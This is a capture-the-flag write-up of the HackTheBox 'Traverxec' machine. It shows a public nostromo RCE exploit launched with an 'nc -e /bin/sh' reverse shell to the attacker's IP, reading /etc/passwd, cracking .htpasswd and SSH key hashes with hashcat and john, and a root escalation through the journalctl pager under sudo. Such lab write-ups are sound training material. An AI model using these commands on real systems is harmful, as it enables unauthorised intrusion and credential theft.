HackTheBox - Traverxec
Morten Hansen • January 30, 2022
Traverxec
IP 10.10.10.165
NMAP
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Visiting http://10.10.10.165 in the brower we can enumerate a bit, and after trying to spoof the links we get to an 404/error-message that specifies the web-service nostromo 1.9.6.
Searching on google nostromo 1.9.6 exploit we find an exploit that gives RCE (Remote Code Execution). https://www.exploit-db.com/exploits/47837
#We set up a listener in our terminal
nc -lnvp 9001
#run exploit
python2 47837.py 10.10.10.165 80 "nc -e /bin/sh 10.10.16.6 9001"
#The nc-command binds a reverse shell to our IP.
We get a shell as www-data and by cat /etc/passwd | grep bash we can see a list of users on the system.
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
david:x:1000:1000:david,,,:/home/david:/bin/bash
ls -la /home/ shows david as user. We are not permitted to read files inside david-folder.
USER ESCALATION
Looking in /var/-folder we find map /nostromo/conf
inside the /var/nostromo/conf/.htpasswd file we find this hash david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/. We can crack the hash with hashcat. We first copy out only the hash and run hashcat -a 0 -m 500 hash.file /usr/share/wordlists/rockyou.txt which gives us password Nowonly4me.
We try the password with ssh david@10.10.10.165 and get an error.
Also iside the /var/nostromo/conf we find a nhttps.conf file.
#nhttpd.conf
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
After reading the manual to nhttpd we see that the config-file mounts the public_www-folder inside the /home-folder. Going to /home/david/public_www we find a new folder protected-file-area followed by backup-ssh-identity-files.tgz.
When extraxting the file we get a new folder that contains a .ssh file. The file is password-protected. We crack it by usin john. We locate ssh2john and gets the hash extracted to a new file. We then run john hash -w /usr/share/wordlists/rockyou.txt --format=ssh and get the password hunter.
With SSH we specify the extracted SSH-file (with -i hunter as password. This allows us in to the server as david.
Inside davids home-folder there is a /bin-folder with a script file.
file: server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
We see that the script runs /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat which tells us that this is specified inside the sudoers-file. We trial a bit and find out that we can run sudo journalctl -n5 -unostromo.service without having to prompt the users passwod, which we do not know.
Trying sudo -l ask us for password and we can't get access.
Typing the command sudo journalctl -n5 -unostromo.service gives us the result of journalctl in a special form. It seems like a presentation that reminds us of more or less text viewer.
Searching in GTFO-bin we see that we can run !/bin/sh inside the editor, and we will remain the permissions and get a root-shell.
